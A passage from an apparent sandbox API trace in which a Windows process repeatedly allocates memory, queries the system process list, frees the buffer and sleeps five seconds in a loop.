RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.816] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.831] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.838] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.846] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.863] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.887] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.901] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.911] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.924] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.937] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.958] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.965] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.972] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.986] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 